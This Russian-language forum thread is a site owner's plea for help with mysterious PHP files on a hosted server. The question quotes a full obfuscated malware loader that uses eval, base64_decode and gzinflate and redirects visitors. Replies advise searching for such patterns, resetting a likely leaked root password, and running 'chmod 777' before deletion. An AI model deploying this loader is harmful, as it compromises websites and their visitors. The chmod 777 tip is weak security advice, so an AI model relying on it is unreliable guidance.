# На сервере появляются непонятне файлы - как быть?

Tags: безопасность, php, вирусы

Добрый день всем. Столкнулся с проблемой - на сервере появляются файлы со следующим содержанием:

```
$XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=d3ced2639e0f1f615fccb5f0b89aa72c10f6267a5VNNa9tAED3H4P8wXXSQQJVi9xJsfDCuUh9CGhT5ZhCyMhsvVbRid127Df7vnV35q00whtJTBUKgee/Nx5sR3Be1yJ/R+KyoKrnOV6rKuWywZgGMRtAL4PXKo58wAi4qtNC8lLXB2mifLY1pBnHMPy5Qm2ghfsaW/1K8FP3IbAwLhgCeLpVozFkBFtkcEYsdRJtCGVR7hS10O1hpFNznq7o0QtY5boS2/NLmoxYIGBDsld4rr1xSskPkkiqJ5fAajWyMTwohTGbp3deHLJ8m489JGsLt+O4xOQ9Nk2yW3mfp+P7x1lKydNYydhN0RNxgaWlHqbKSGg+/znRwbkz/vIWDjRd2sW1dI1O6nW7H443dAC3Lb3a7fHZ0g4Vwcx2Ch0rVsv1qo0L4dG2VBAefyM7dbgfo8eTKlsG+JBn87iRMs+wh7kW9uZrXbHgCjwg/ldoM4JgX3kVNZF2jW7IBTGxLFnWK5GslDNqaQscK9goKte2R7YHrJbkE/geOkrsW6JbayBFOGTldhG7lev2bvdp2l2w3VWLvAhUtvu8tsXhCmpG3kE8/6FKhUfic66ay2xLP03ka01hdjhD6hxLbNXSkoXPorTEW8zeG/Lmal3hic/5/ZhwO6sQPezTfi4om3EaD4S8=
```

Непонятно откуда берутся файлы: то ли сайт ломанули, то ли хостинг файлы создаются под РУТ пользователем, так что по простому через ФТП не удаляются. Редиректят куда попало при переходе на них. Как бороться с подобной вещью, подскажите, кто сталкивался?

Comment: > Как бороться с подобной вещью подскажите кто сталкивался ??

Проще всего слить из базы данных все актуальные материалы и переустановить все заново. Однако червь, который это устраивает, скорее всего тоже может быть найден по запросам "base64" и "eval".

Comment: Червь находится на сервере ?? получается

Comment: Как его можно найти ?? Подскажите пожалуйста а то я даже не знаю в какую сторону смотреть.

Comment: > файлы создаются под РУТ пользователем

И права/юзер на них не меняются? Тогда самое вероятное объяснение - утёк ваш рутовый пароль. Меняйте его и никогда больше не работайте под рутом, только в случае серьёзных системно-административных задач. Даже если файлы создаются косвенно, какой-нибудь рутовой cronjob etc - нет ни одной веской причины так делать.

Comment: @alexsis20102, Постарайтесь писать более развернутые вопросы. Поясните, какая операционная исстема используется, какой хостинг, CMS и т. д.

Comment: Сервер UNIX Хостинг Agava

Comment: > Червь находится на сервере ?? получается

Ну а где еще

> Как его можно найти ?? Подскажите пожалуйста а то я даже не знаю в какую сторону смотреть.

Я вообще-то написал выше. Искать по файлам `eval`, `base64_decode`, `jquery.php`, где-то была простая тулза-анализатор.

> так что по простому через ФТП не удаляются. 

99% что нужно просто сделать `chmod 777` перед удалением.

Comment: давно с агавы свалил, постоянно чтото появлялось на сайте, нафиг-нафиг